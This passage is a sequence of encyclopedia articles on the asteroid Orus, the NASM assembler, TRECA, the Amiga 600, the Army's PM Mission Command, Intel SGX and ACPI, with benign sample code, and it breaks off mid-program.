In 2016, Mottola published a revised rotation period of 13.5 hours, derived from ground-based observations taken over five apparitions in support of the Lucy mission. He finds that Orus is a retrograde rotator. The lightcurve suggests the presence of a large crater in the proximity of its north pole.
Diameter and albedo
According to the surveys carried out by the Japanese Akari satellite and the NEOWISE mission of NASA's Wide-field Infrared Survey Explorer, the body has an albedo of 0.083 and 0.075, with a diameter of 53.87 and 50.81 kilometers, respectively. The Collaborative Asteroid Lightcurve Link assumes a standard albedo for carbonaceous C-type asteroids of 0.057 and calculates a diameter of 55.67 kilometers with an absolute magnitude of 10.0.
Naming
This minor planet was named from Greek mythology after Orus, an Achaean warrior in Homer's Iliad. He was killed in the Trojan War by the Trojan prince Hector, after whom the largest Jupiter trojan 624 Hektor is named. The approved naming citation was published by the Minor Planet Center on 22 February 2016.
Satellite
Orus has a candidate satellite, detected while searching through Hubble images taken on August 7 and 8, 2018. Further observations are needed to determine physical characteristics of the satellite, which can help measure the mass of the primary.
See also
Discovery program
References
External links
Asteroid Lightcurve Database (LCDB), query form (info )
Dictionary of Minor Planet Names, Google books
Discovery Circumstances: Numbered Minor Planets (20001)-(25000) – Minor Planet Center
Asteroid 21900 Orus at the Small Bodies Data Ferret
021900
Discoveries by Takao Kobayashi
Minor planets named from Greek mythology
Named minor planets
021900
19991109
|
60647
|
https://en.wikipedia.org/wiki/Netwide%20Assembler
|
Netwide Assembler
|
The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture. It can be used to write 16-bit, 32-bit (IA-32) and 64-bit (x86-64) programs. NASM is considered to be one of the most popular assemblers for Linux.
NASM was originally written by Simon Tatham with assistance from Julian Hall. It is maintained by a small team led by H. Peter Anvin. It is open-source software released under the terms of a simplified (2-clause) BSD license.
Features
NASM can output several binary formats, including COFF, OMF, a.out, Executable and Linkable Format (ELF), Mach-O and binary file (.bin, binary disk image, used to compile operating systems), though position-independent code is supported only for ELF object files. NASM also has its own binary format called RDOFF.
The variety of output formats allows retargeting programs to virtually any x86 operating system (OS). Also, NASM can create flat binary files, usable to write boot loaders, read-only memory (ROM) images, and in various facets of OS development. NASM can run on non-x86 platforms as a cross assembler, such as PowerPC and SPARC, though it cannot generate programs usable by those machines.
NASM uses a variant of Intel assembly syntax instead of AT&T syntax. It also avoids features such as automatic generation of segment overrides (and the related ASSUME directive) used by MASM and compatible assemblers.
Sample programs
This is a "Hello, world!" program for the DOS operating system.
section .text
org 0x100
mov ah, 0x9
mov dx, hello
int 0x21
mov ax, 0x4c00
int 0x21
section .data
hello: db 'Hello, world!', 13, 10, '$'
An equivalent program for Linux:
global _start
section .text
_start:
mov eax, 4 ; write
mov ebx, 1 ; stdout
mov ecx, msg
mov edx, msg.len
int 0x80 ; write(stdout, msg, strlen(msg));
xor eax, msg.len ; zero eax if write() returned msg.len (all bytes written); used as the exit status
xchg eax, ebx ; value for exit()
mov eax, 1 ; exit
int 0x80 ; exit(...)
section .data
msg: db "Hello, world!", 10
.len: equ $ - msg
An example of a similar program for Microsoft Windows:
global _main
extern _MessageBoxA@16
extern _ExitProcess@4
section code use32 class=code
_main:
push dword 0 ; UINT uType = MB_OK
push dword title ; LPCSTR lpCaption
push dword banner ; LPCSTR lpText
push dword 0 ; HWND hWnd = NULL
call _MessageBoxA@16
push dword 0 ; UINT uExitCode
call _ExitProcess@4
section data use32 class=data
banner: db 'Hello, world!', 0
title: db 'Hello', 0
Below is a 64-bit program for Apple OS X that reads a keystroke and displays it on the screen:
global _start
section .data
query_string: db "Enter a character: "
query_string_len: equ $ - query_string
out_string: db "You have input: "
out_string_len: equ $ - out_string
section .bss
in_char: resw 4
section .text
_start:
mov rax, 0x2000004 ; put the write-system-call-code into register rax
mov rdi, 1 ; tell kernel to use stdout
mov rsi, query_string ; rsi is where the kernel expects to find the address of the message
mov rdx, query_string_len ; and rdx is where the kernel expects to find the length of the message
syscall
; read in the character
mov rax, 0x2000003 ; read system call
mov rdi, 0 ; stdin
mov rsi, in_char ; address for storage, declared in section .bss
mov rdx, 2 ; get 2 bytes from the kernel's buffer (the character plus the trailing newline)
syscall
; show user the output
mov rax, 0x2000004 ; write system call
mov rdi, 1 ; stdout
mov rsi, out_string
mov rdx, out_string_len
syscall
mov rax, 0x2000004 ; write system call
mov rdi, 1 ; stdout
mov rsi, in_char
mov rdx, 2 ; the second byte echoes the newline read along with the character
syscall
; exit system call
mov rax, 0x2000001 ; exit system call
xor rdi, rdi
syscall
Linking
NASM principally outputs object files, which are generally not executable by themselves. The only exception is flat binary output (e.g., DOS .COM files), which is inherently limited in modern use. To translate the object files into executable programs, an appropriate linker must be used, such as the Visual Studio "LINK" utility for Windows or ld for Unix-like systems.
Development
The first release, version 0.90, was released in October 1996.
On 28 November 2007, version 2.00 was released, adding support for x86-64 extensions. The development versions are not uploaded to SourceForge.net; instead, they are checked into GitHub with binary snapshots available from the project web page.
A search engine for NASM documentation is also available.
In July 2009, starting with version 2.07, NASM was released under the Simplified (2-clause) BSD license. NASM had previously been licensed under the LGPL, which led to the development of Yasm, a complete rewrite of NASM under the New BSD License. Yasm offered support for x86-64 earlier than NASM, and also added support for GNU Assembler syntax.
RDOFF
Relocatable Dynamic Object File Format (RDOFF) is used by developers to test the integrity of NASM's object file output abilities. It is based heavily on the internal structure of NASM, essentially consisting of a header containing a serialization of the output driver function calls followed by an array of sections containing executable code or data. Tools for using the format, including a linker and loader, are included in the NASM distribution.
Until version 0.90 was released in October 1996, NASM supported output of only flat-format executable files (e.g., DOS COM files). In version 0.90, Simon Tatham added support for an object-file output interface, and for DOS .OBJ files for 16-bit code only.
NASM thus lacked a 32-bit object format. To address this lack, and as an exercise to learn the object-file interface, developer Julian Hall put together the first version of RDOFF, which was released in NASM version 0.91.
Since this initial version, there has been one major update to the RDOFF format, which added a record-length indicator on each header record, allowing programs to skip over records whose format they do not recognise, and support for multiple segments; RDOFF1 only supported three segments: text, data and bss (containing uninitialized data).
The RDOFF format is strongly deprecated and has been disabled starting in NASM 2.15.04.
See also
Assembly language
Comparison of assemblers
References
Further reading
External links
Special edition for Win32 and BeOS.
A comparison of GAS and NASM at IBM
A converter between the source format of the assemblers NASM and GAS
1996 software
Assemblers
Disassemblers
DOS software
Free compilers and interpreters
Linux programming tools
MacOS
MacOS programming tools
Programming tools for Windows
Software using the BSD license
|
10885991
|
https://en.wikipedia.org/wiki/Tri-Rivers%20Educational%20Computer%20Association
|
Tri-Rivers Educational Computer Association
|
Tri-Rivers Educational Computer Association (TRECA) is an information technology center (ITC) founded in 1979 and serving the state of Ohio. It serves a consortium of local school districts across the state, providing technology and educational support. TRECA provides services in the areas of student information systems, state reporting, fiscal services, instructional services, professional development training and information technology support.
TRECA also operates TRECA Digital Academy, an online public school for Ohio students in grades K-12, headquartered in Marion, Ohio. The school provides students in many school districts in Ohio with distance learning options. The program serves nearly 3000 students and is particularly targeted at students who are at-risk, ill, or home-schooled. Students work from home on school-supplied computers; they correspond with teachers and send in assignments electronically. The Akron school district has the largest such program in Ohio. Students who complete the program through 12th grade graduate with a regular high school diploma and a cap-and-gown graduation ceremony.
In 2018, TRECA Digital Academy began offering students an opportunity to learn workplace skills, earn college credit, and pursue industry credentials through a career technical education program called TRECA Tech. The courses in the program currently include cybersecurity, marketing, computer and web programming, business and administrative services, interactive media, finance, accounting, and Cisco networking.
References
External links
Official website
YouTube channel
Facebook page
Twitter page
Instagram page
Information technology organizations based in North America
Computer companies established in 1979
Schools in Ohio
Online K–12 schools
Online schools in the United States
|
64975
|
https://en.wikipedia.org/wiki/Amiga%20600
|
Amiga 600
|
The Amiga 600, also known as the A600, is a home computer introduced in March 1992. It is the final Amiga model based on the Motorola 68000 and the 1990 Amiga Enhanced Chip Set. A redesign of the Amiga 500 Plus, it adds the option of an internal hard disk drive and a PCMCIA port. Lacking a numeric keypad, the A600 is only slightly larger than an IBM PC keyboard and weighs approximately 6 pounds. It shipped with AmigaOS 2.0, which was considered more user-friendly than earlier versions of the operating system.
Like the A500, the A600 was aimed at the lower end of the market. Commodore intended it to revitalize sales of the A500-related line before the introduction of the 32-bit Amiga 1200. According to Dave Haynie, the A600 "was supposed to be cheaper than the A500, but it came in at about that much more expensive." The A600 was originally to have been numbered the A300, positioning it as a lower-budget version of the Amiga 500 Plus.
An A600HD model was sold with an internal 2.5" ATA hard disk drive of either 20 or 40 MB.
The Amiga 600's compatibility with earlier Amiga models is rather poor: roughly one third of games and demos made for the A1000 or A500 do not work on the A600.
Release
The managing director of Commodore UK, David Pleasance, described the A600 as a "complete and utter screw-up". In comparison to the popular A500 it was considered unexpandable, did not improve on the A500's CPU, was more expensive, and lacked a numeric keypad which some existing software such as F/A-18 Interceptor required.
The A600 was the first Amiga model to be manufactured in the UK. The factory was in Irvine, Scotland, although some later examples were manufactured in Hong Kong. It was also manufactured in the Philippines.
Technical information
The A600 shipped with a Motorola 68000 CPU, running at 7.09 MHz (PAL) or 7.16 MHz (NTSC) and 1 MB "chip" RAM with 80-ns access time.
Graphics and sound
The A600 is the last Amiga model to use Commodore's Enhanced Chip Set (ECS), which can address 2 MB of RAM and adds higher resolution display modes. The so-called Super Agnus display chip can drive screen modes varying from 320×200 pixels to 1280×512 pixels, with different frequency sync. As with the original Amiga chipset, up to 32 colors can be displayed from a 12-bit (4096 color) palette at lower display resolutions. An extra-half-bright mode offers 64 simultaneous colors by allowing each of the 32 colors in the palette to be dimmed to half brightness. Additionally, a 4096-color "HAM" mode can be used at lower resolutions. At higher resolutions, such as 800×600i, only 4 simultaneous colors can be displayed.
Sound was unchanged from the original Amiga design, namely, 4 DMA-driven 8-bit channels, with two channels for the left speaker and two for the right.
The A600 was the first Amiga model with a built-in RF modulator (RCA), which allowed the A600 to be used with a standard CRT television without the need for a Commodore A520 RF Modulator adaptor.
Peripherals and expansion
The A600 features Amiga-specific connectors including two DB9M ports for joysticks, mice, and light pens, a standard 25-pin RS-232 serial port and a 25-pin Centronics parallel port. As a result, the A600 is compatible with many peripherals available for earlier Amiga models, such as MIDI, sound samplers and video-capture devices.
Expansion capabilities new to the Amiga line were the PCMCIA Type II slot and the internal 44-pin ATA interface both most commonly seen on laptop computers. Both interfaces are controlled by the 'Gayle' custom chip. The A600 has internal housing for one 2.5" internal hard disk drive connecting to the ATA controller.
The A600 is the first of only two Amiga models to feature a PCMCIA Type II interface. This connector allows use of a number of compatible peripherals available for the laptop-computer market, although only 16-bit PCMCIA cards are hardware-compatible; newer 32-bit PC Card (CardBus) peripherals are incompatible. Mechanically, only Type I and Type II cards fit in the slot; thicker Type III cards will not fit (although they may connect if the A600 is removed from its original case). The port is also not fully compliant with the PCMCIA Type II standard as the A600 was developed before the standard was finalized. The PCMCIA implementation on the A600 is almost identical to the one featured on a later Amiga, the 1200. A number of Amiga peripherals were released by third-party developers for this connector including SRAM cards, CD-ROM controllers, SCSI controllers, network cards, sound samplers, and video-capture devices. Although PCMCIA was similar in spirit to Commodore's expansion architecture for its earlier systems, the intended capability for convenient external expansion through this connector was largely unrealized at the time of release because of the prohibitive expense of PCMCIA peripherals for a lower-budget personal computer. Later, a number of compatible laptop-computer peripherals have been made to operate with the A600, including network cards (both wired and wireless), serial modems and CompactFlash adapters.
Operating system
The A600 shipped with AmigaOS 2.0, consisting of Workbench 2.0 and a Kickstart ROM revision 37.299, 37.300 or 37.350 (Commodore's internal revision numbers). Confusingly, all three ROM revisions were officially designated as version "2.05". Some early A600s shipped with Kickstart 37.299, which had neither support for the internal ATA controller, nor for the PCMCIA interface. Although it is possible to load the necessary drivers from floppy disk, it is not possible to boot directly from ATA or PCMCIA devices. Models fitted with Kickstart 37.300 or 37.350 can utilize those devices at boot time. Version 37.350 improved compatibility with ATA hard disks by increasing the wait time for disks to spin up during boot.
Specifications
Bundled software
In addition to the stock A600, mouse, power supply, and Workbench disk package, the A600 was available with the following software and hardware bundles:
'Lemmings' bundle (1992): Lemmings and the Electronic Arts graphics package Deluxe Paint III.
'Robocop 3D' bundle (1992): Robocop 3D, Myth, Shadow of the Beast III, Graphic Workshop and Microtext
'Wild, Weird and Wicked' bundle (late 1992, £349 launch price): Formula One Grand Prix, Pushover, Putty and Deluxe Paint III
A600HD 'Epic/Language' bundle (1992, £499 launch price): including an internal 20 MB hard disk drive, a word processor, Trivial Pursuit, Myth, Rome and Epic.
Upgrades
CPU
Although the 68000 is soldered to the motherboard, unofficial CPU upgrades include the Motorola 68010, 68020 (at up to 25 MHz), and 68030 (at up to 50 MHz). The processor is upgraded not by replacing the 68000, but by fitting a connector over the CPU and commandeering the system bus. However, this approach caused instability problems with some board designs, prompting custom modifications for stable operation. As a result, such CPU expansions were largely unpopular.
Memory
RAM can be upgraded to a maximum of 2 MB "chip RAM" using the trap-door expansion slot. An additional 4 MB of "fast RAM" can be added in the PC Card slot using a suitable SRAM card to reach a capacity of 6 MB. However, more "fast RAM" can be added with unofficial memory or CPU upgrades. For example, the A608 board adds up to a maximum of 8 MB additional RAM by connecting over the original 68000. Likewise, CPU upgrades can accommodate up to 64 MB.
Operating system
It is possible to upgrade the A600 to Workbench 2.1. This features a localization of the operating system in several languages and has a "CrossDOS" driver providing read/write support for FAT (MS-DOS)-formatted media such as floppy disks or hard drives. Workbench 2.1 was a software only update which runs on all Kickstart ROMs of the 2.0x family.
Following the release of AmigaOS 3.1 in 1994 it was possible to upgrade the A600 by installing a compatible revision 40.63 Kickstart ROM.
Other
The FPGA-driven Vampire adds 128 MB of Fast RAM, HDMI output, an SD card slot for HDD storage and a 64-bit core with full 32-bit compatibility.
See also
Amiga models and variants
References
Karl Foster (ed), "10 Totally Amazing Euro-Amiga Facts", Amiga Format, Annual 1993, p 55.
External links
History page
The Extreme A600 Upgrade Page
A600 specifications and motherboard photos
More A600 specifications including processor and RAM upgrades
Amiga-Stuff hardware information
Famous Amiga Uses
Amiga
68000-based home computers
|
36725176
|
https://en.wikipedia.org/wiki/Project%20Manager%20Mission%20Command
|
Project Manager Mission Command
|
Project Manager Mission Command (or PM MC) is a component of Program Executive Office Command, Control and Communications-Tactical in the United States Army. PM MC develops, deploys and sustains integrated Mission Command software capabilities to the Army and Joint forces. PM MC’s support ensures tactical and other unit types are efficiently fielded, effectively trained and professionally supported. Product lines include the areas of maneuver, fires, sustainment, and infrastructure.
Mission statement
"To provide intuitive, adaptive mission command and situational awareness capabilities for the command post and platform that enable mission execution by commanders and leaders at all levels to be more effective, agile and decisive."
About PM MC
"PM MC delivers capabilities across the warfighting functions of movement and maneuver, command and control, fires, sustainment, protection, intelligence and engagement. Implementing the Army’s Common Operating Environment, PM MC fields the Command Post Computing Environment (CP CE) and, the Mounted Computing Environment (MCE) while facilitating interoperability between CP CE, MCE and other CEs. PM MC uses an agile development process to achieve both near-term deliveries to current systems and longer-term development to enhance mission command capabilities."
Alternate definitions
The Army’s framework for exercising mission command is the operations process: the major mission command activities performed during operations are planning, preparing, executing, and continuously assessing the operation.
The concept of mission command is to help Army forces function effectively and accomplish missions. The Army’s primary mission is to organize, train, and equip forces to conduct prompt sustained land combat operations.
History
PM Battle Command
PM Mission Command
Merge with Project Manager JBC-P
In May 2014 Project Manager Mission Command merged with Project Manager Joint Battle Command-Platform (PM JBC-P) under Mission Command. PdM JBC-P transitioned into a subordinate product of PM MC.
Col. Michael Thurston, the former project manager for PM JBC-P assumed command of PM MC. The intent of the combined organization was to consolidate and simplify the many different digital systems that the military uses.
PM MC organization
PM MC's product offices are Tactical Mission Command (TMC), Fire Support Command and Control (FSC2), Joint Battle Command-Platform (JBC-P), Strategic Mission Command (SMC), Tactical Digital Media (TDM), and Command Post Computing Environment (CP CE).
Tactical Mission Command provides the Army’s core mission command and collaborative environment and maneuver applications, which include Command Post of the Future (CPOF), Command Web, and Common Tactical Vision (CTV)
Fire Support Command and Control provides lethal and non-lethal fires through products including Advanced Field Artillery Tactical Data System (AFATDS), Joint Automated Deep Operations Coordination System (JADOCS), Pocket-Sized Forward Entry Device (PFED), Lightweight Forward Entry Device (LFED), CENTAUR (Lightweight Technical Fire Direction System) and Gun Display Unit-Replacement (GDU-R)
Joint Battle Command-Platform
Strategic Mission Command provides operational and strategic tools through products including Battle Command Common Services (BCCS), Global Command and Control System-Army (GCCS-A), Common Software, Joint Convergence/Multilateral Interoperability Program (MIP), Battle Command and Staff Training (BCST), and Tactical Edge Data Solutions Joint Capability Technology Demonstration (TEDS JCTD).
Tactical Digital Media
Command Post Computing Environment
References
External links
PM MC Public Site
Research installations of the United States Army
Military installations in Maryland
Commands of the United States Army
Military acquisition
United States defense procurement
Command and control systems of the United States military
|
46464527
|
https://en.wikipedia.org/wiki/Software%20Guard%20Extensions
|
Software Guard Extensions
|
Intel Software Guard Extensions (SGX) is a set of security-related instruction codes that are built into some Intel central processing units (CPUs). They allow user-level as well as operating system code to define private regions of memory, called enclaves, whose contents are intended to be protected and unreadable by any process outside the enclave itself, including processes running at higher privilege levels. These design goals were not met; numerous attacks were found, leading Intel to stop offering SGX in newer processors.
SGX involves encryption by the CPU of a portion of memory. The enclave is decrypted on the fly only within the CPU itself, and even then, only for code and data running from within the enclave itself. The processor thus protects the code from being "spied on" or examined by other code. SGX's threat model assumes that the enclave is trusted but that no process outside it can be trusted (including the operating system itself and any hypervisor), so all of these are treated as potentially hostile. The enclave contents cannot be read by any code outside the enclave, other than in encrypted form. Applications running inside SGX must be written to be side-channel resistant, as SGX does not protect against side-channel measurement or observation.
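As a rough illustration of this split between untrusted host code and the trusted enclave, the following is a minimal host-side sketch using the untrusted runtime of the Intel SGX SDK. The enclave file name, the generated header enclave_u.h and the ECALL seal_secret are hypothetical placeholders that would normally be produced from the developer's EDL interface definition; treat it as a sketch rather than a definitive implementation.
/* Minimal, hypothetical host-side sketch (Intel SGX SDK, untrusted runtime).
   "enclave_u.h" and seal_secret() are placeholders generated from an EDL file. */
#include <stdio.h>
#include <sgx_urts.h>
#include "enclave_u.h"

int main(void)
{
    sgx_enclave_id_t eid = 0;
    sgx_launch_token_t token = {0};
    int token_updated = 0;

    /* Load the signed enclave image; the CPU measures it and maps it into protected memory. */
    sgx_status_t ret = sgx_create_enclave("enclave.signed.so", 1 /* debug */,
                                          &token, &token_updated, &eid, NULL);
    if (ret != SGX_SUCCESS) {
        fprintf(stderr, "sgx_create_enclave failed: 0x%x\n", ret);
        return 1;
    }

    /* Call into the enclave through a generated ECALL proxy (hypothetical seal_secret). */
    ret = seal_secret(eid, 42);
    if (ret != SGX_SUCCESS)
        fprintf(stderr, "ECALL failed: 0x%x\n", ret);

    sgx_destroy_enclave(eid);
    return 0;
}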
SGX is designed to be useful for implementing secure remote computation, secure web browsing, and digital rights management (DRM). Other applications include concealment of proprietary algorithms and of encryption keys.
Details
SGX was first introduced in 2015 with the sixth generation Intel Core microprocessors based on the Skylake microarchitecture.
Support for SGX in the CPU is indicated in CPUID "Structured Extended feature Leaf", EBX bit 02, but its availability to applications requires BIOS/UEFI support and opt-in enabling which is not reflected in CPUID bits. This complicates the feature detection logic for applications.
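A minimal sketch of this detection step in C, using the GCC/Clang cpuid.h helper __get_cpuid_count (the bit checked is the SGX feature bit in leaf 7, sub-leaf 0, EBX bit 2; as noted above, a set bit does not mean that firmware has actually enabled SGX):
/* Sketch: check the CPUID SGX feature bit (leaf 0x07, sub-leaf 0, EBX bit 2).
   Uses the GCC/Clang <cpuid.h> helpers; a set bit only means the CPU supports
   SGX, not that BIOS/UEFI has enabled it. */
#include <stdio.h>
#include <cpuid.h>

int main(void)
{
    unsigned int eax, ebx, ecx, edx;

    if (!__get_cpuid_count(7, 0, &eax, &ebx, &ecx, &edx)) {
        puts("CPUID leaf 7 not supported");
        return 1;
    }
    printf("SGX supported by CPU: %s\n", (ebx & (1u << 2)) ? "yes" : "no");
    return 0;
}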
Emulation of SGX was added to an experimental version of the QEMU system emulator in 2014. In 2015, researchers at the Georgia Institute of Technology released an open-source simulator named "OpenSGX".
One example of SGX used in security was a demo application from wolfSSL using it for cryptography algorithms.
Intel Goldmont Plus (Gemini Lake) microarchitecture also contains support for Intel SGX.
In both the 11th and 12th generations of Intel Core processors, SGX is listed as "Deprecated" and is thereby no longer supported.
Attacks
Prime+Probe attack
On 27 March 2017, researchers at Austria's Graz University of Technology developed a proof-of-concept that can grab RSA keys from SGX enclaves running on the same system within five minutes by using certain CPU instructions in lieu of a fine-grained timer to exploit cache DRAM side-channels. One countermeasure for this type of attack was presented and published by Daniel Gruss et al. at the USENIX Security Symposium in 2017. Another published countermeasure is DR.SGX, a compiler-based tool released on September 28, 2017, which claims superior performance while eliminating the implementation complexity of other proposed solutions.
Spectre-like attack
The LSDS group at Imperial College London showed a proof of concept that the Spectre speculative execution security vulnerability can be adapted to attack the secure enclave. The Foreshadow attack, disclosed in August 2018, combines speculative execution and buffer overflow to bypass the SGX.
Enclave attack
On 8 February 2019, researchers at Austria's Graz University of Technology published findings, which showed that in some cases it is possible to run malicious code from within the enclave itself. The exploit involves scanning through process memory, in order to reconstruct a payload, which can then run code on the system. The paper claims that due to the confidential and protected nature of the enclave, it is impossible for antivirus software to detect and remove malware residing within it. However, since modern anti-malware and antivirus solutions monitor system calls, and the interaction of the application with the operating system, it should be possible to identify malicious enclaves by their behavior, and this issue is unlikely to be a concern for state-of-the-art antiviruses. Intel issued a statement, stating that this attack was outside the threat model of SGX, that they cannot guarantee that code run by the user comes from trusted sources, and urged consumers to only run trusted code.
MicroScope replay attack
A proliferation of side-channel attacks plagues modern computer architectures. Many of these attacks measure slight, nondeterministic variations in the execution of some code, so the attacker needs many, possibly tens of thousands, of measurements to learn secrets. The MicroScope attack, however, allows a malicious OS to replay code an arbitrary number of times regardless of the program's actual structure, enabling dozens of side-channel attacks.
Plundervolt
Security researchers were able to inject timing-specific faults into execution within the enclave, resulting in leakage of information. The attack can be executed remotely, but requires access to the privileged control of the processor's voltage and frequency.
LVI
Load Value Injection (LVI) injects attacker-controlled data into a program, replacing the value loaded from memory. The injected value is used for a short time before the mistake is spotted and rolled back, during which LVI controls data and control flow.
SGAxe
SGAxe, an SGX vulnerability, extends a speculative execution attack on the cache, leaking the content of the enclave. This allows an attacker to access private CPU keys used for remote attestation. In other words, a threat actor can bypass Intel's countermeasures to breach the confidentiality of SGX enclaves. The SGAxe attack is carried out by extracting attestation keys from SGX's private quoting enclave, which are signed by Intel. The attacker can then masquerade as legitimate Intel machines by signing arbitrary SGX attestation quotes.
See also
Intel MPX
Spectre-NG
Trusted execution environment (TEE)
References
External links
Intel Software Guard Extensions (Intel SGX) / ISA Extensions, Intel
Intel Software Guard Extensions (Intel SGX) Programming Reference, Intel, October 2014
IDF 2015 - Tech Chat: A Primer on Intel Software Guard Extensions, Intel (poster)
ISCA 2015 tutorial slides for Intel SGX, Intel, June 2015
McKeen, Frank, et al. (Intel), Innovative Instructions and Software Model for Isolated Execution // Proceedings of the 2nd International Workshop on Hardware and Architectural Support for Security and Privacy. ACM, 2013.
Jackson, Alon, (PhD dissertation). Trust is in the Keys of the Beholder: Extending SGX Autonomy and Anonymity, May 2017.
Joanna Rutkowska, Thoughts on Intel's upcoming Software Guard Extensions (Part 1), August 2013
SGX: the good, the bad and the downright ugly / Shaun Davenport, Richard Ford (Florida Institute of Technology) / Virus Bulletin, 2014-01-07
Victor Costan and Srinivas Devadas, Intel SGX Explained, January 2016.
wolfSSL, October 2016.
The Security of Intel SGX for Key Protection and Data Privacy Applications / Professor Yehuda Lindell (Bar Ilan University & Unbound Tech), January 2018
Intel SGX Technology and the Impact of Processor Side-Channel Attacks, March 2020
How Confidential Computing Delivers A Personalised Shopping Experience, January 2021
Intel
X86 instructions
Computer security
|
2432697
|
https://en.wikipedia.org/wiki/Advanced%20Configuration%20and%20Power%20Interface
|
Advanced Configuration and Power Interface
|
In a computer, the Advanced Configuration and Power Interface (ACPI) provides an open standard that operating systems can use to discover and configure computer hardware components, to perform power management (e.g., putting unused hardware components to sleep), to perform auto-configuration (e.g., Plug and Play and hot swapping), and to perform status monitoring. First released in December 1996, ACPI aims to replace Advanced Power Management (APM), the MultiProcessor Specification, and the Plug and Play BIOS (PnP) Specification. ACPI brings power management under the control of the operating system, as opposed to the previous BIOS-centric system that relied on platform-specific firmware to determine power management and configuration policies. The specification is central to the Operating System-directed configuration and Power Management (OSPM) system. ACPI defines hardware abstraction interfaces between the device's firmware (e.g., BIOS, UEFI), the computer hardware components, and the operating system.
Internally, ACPI advertises the available components and their functions to the operating system kernel using instruction lists ("methods") provided through the system firmware (UEFI or BIOS), which the kernel parses. The kernel then executes the desired operations, written in ACPI Machine Language (such as the initialization of hardware components), using an embedded minimal virtual machine.
Intel, Microsoft and Toshiba originally developed the standard, while HP, Huawei and Phoenix also participated later. In October 2013, ACPI Special Interest Group (ACPI SIG), the original developers of the ACPI standard, agreed to transfer all assets to the UEFI Forum, in which all future development will take place.
The UEFI Forum published the latest version of the standard, Revision 6.4, at the end of January 2021.
Architecture
The firmware-level ACPI has three main components: the ACPI tables, the ACPI BIOS, and the ACPI registers. The ACPI BIOS generates the ACPI tables and loads them into main memory. Much of the firmware's ACPI functionality is provided as bytecode of ACPI Machine Language (AML), a Turing-complete, domain-specific low-level language, stored in the ACPI tables. To make use of the ACPI tables, the operating system must have an interpreter for the AML bytecode. A reference AML interpreter implementation is provided by the ACPI Component Architecture (ACPICA). At BIOS development time, AML bytecode is compiled from ASL (ACPI Source Language) code.
The overall design decision was not without criticism. In November 2003, Linus Torvalds, author of the Linux kernel, described ACPI as "a complete design disaster in every way". In 2001, other senior Linux software developers like Alan Cox expressed concerns about the requirement that bytecode from an external source must be run by the kernel with full privileges, as well as the overall complexity of the ACPI specification. In 2014, Mark Shuttleworth, founder of the Ubuntu Linux distribution, compared ACPI to Trojan horses.
ACPI Component Architecture (ACPICA)
The ACPI Component Architecture (ACPICA), mainly written by Intel's engineers, provides an open-source platform-independent reference implementation of the operating system–related ACPI code. The ACPICA code is used by Linux, Haiku, ArcaOS and FreeBSD, which supplement it with their operating-system specific code.
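As a rough sketch of how an operating system might bring the ACPICA subsystem up, the sequence below uses function names from ACPICA's public interface; exact signatures and flags vary between ACPICA releases, so treat this as illustrative rather than definitive.
/* Illustrative ACPICA bring-up sequence as an OS kernel might perform it.
   Names follow ACPICA's public API; details vary by release. */
#include "acpi.h"

ACPI_STATUS init_acpi(void)
{
    ACPI_STATUS status;

    status = AcpiInitializeSubsystem();              /* core ACPICA data structures */
    if (ACPI_FAILURE(status)) return status;

    status = AcpiInitializeTables(NULL, 16, FALSE);  /* locate RSDP and the root tables */
    if (ACPI_FAILURE(status)) return status;

    status = AcpiLoadTables();                       /* parse DSDT/SSDTs, build the namespace */
    if (ACPI_FAILURE(status)) return status;

    status = AcpiEnableSubsystem(ACPI_FULL_INITIALIZATION);   /* enter ACPI mode */
    if (ACPI_FAILURE(status)) return status;

    return AcpiInitializeObjects(ACPI_FULL_INITIALIZATION);   /* run _INI and friends */
}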
History
The first revision of the ACPI specification was released in December 1996, supporting 16, 24 and 32-bit addressing spaces. It was not until August 2000 that ACPI received 64-bit address support as well as support for multiprocessor workstations and servers with revision 2.0.
In September 2004, revision 3.0 was released, bringing to the ACPI specification support for SATA interfaces, PCI Express bus, multiprocessor support for more than 256 processors, ambient light sensors and user-presence devices, as well as extending the thermal model beyond the previous processor-centric support.
Released in June 2009, revision 4.0 of the ACPI specification added various new features to the design; most notable are the USB 3.0 support, logical processor idling support, and x2APIC support.
Revision 5.0 of the ACPI specification was released in December 2011, which added the ARM architecture support. The revision 5.1 was released in July 2014.
The latest specification revision is 6.4, which was released in January 2021.
Operating systems
Microsoft's Windows 98 was the first operating system to implement ACPI, but its implementation was somewhat buggy or incomplete, although some of the problems associated with it were caused by the first-generation ACPI hardware. Other operating systems, including later versions of Windows, eComStation, ArcaOS, FreeBSD (since FreeBSD 5.0), NetBSD (since NetBSD 1.6), OpenBSD (since OpenBSD 3.8), HP-UX, OpenVMS, Linux, GNU Hurd and PC versions of Solaris, have at least some support for ACPI. Some newer operating systems, like Windows Vista, require the computer to have an ACPI-compliant BIOS, and since Windows 8, the S0ix/Modern Standby state was implemented.
Windows operating systems use acpi.sys to access ACPI events.
ACPI could be disabled on Windows XP and earlier by pressing the F7 key while Windows setup was starting; with the release of Windows Vista and later, this is no longer possible. In addition, if Windows cannot interpret a machine's ACPI tables during installation, setup fails with a 0x000000A5 ("The BIOS in this system is not fully ACPI compliant") Blue Screen of Death. On Windows XP and earlier this could be circumvented by pressing F7; on newer versions such as Vista, a patched ACPI.sys driver must be slipstreamed into the installation media to bypass the issue, due to the lack of an F7 option during setup.
The 2.4 series of the Linux kernel had only minimal support for ACPI, with better support implemented (and enabled by default) from kernel version 2.6.0 onwards. Old ACPI BIOS implementations tend to be quite buggy, and consequently are not supported by later operating systems. For example, Windows 2000, Windows XP, and Windows Server 2003 only use ACPI if the BIOS date is after January 1, 1999. Similarly, Linux kernel 2.6 blacklisted any ACPI BIOS from before January 1, 2001.
Linux-based operating systems can provide access to ACPI events via acpid.
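A minimal sketch of a client consuming these events, assuming acpid's default UNIX-domain socket at /var/run/acpid.socket and its plain-text, one-line-per-event output format:
/* Sketch: read ACPI events from acpid's default UNIX-domain socket.
   Assumes the default socket path; acpid streams one text line per event. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

int main(void)
{
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    struct sockaddr_un addr = { .sun_family = AF_UNIX };
    strncpy(addr.sun_path, "/var/run/acpid.socket", sizeof(addr.sun_path) - 1);

    if (fd < 0 || connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("acpid socket");
        return 1;
    }

    char buf[256];
    ssize_t n;
    while ((n = read(fd, buf, sizeof(buf) - 1)) > 0) {
        buf[n] = '\0';
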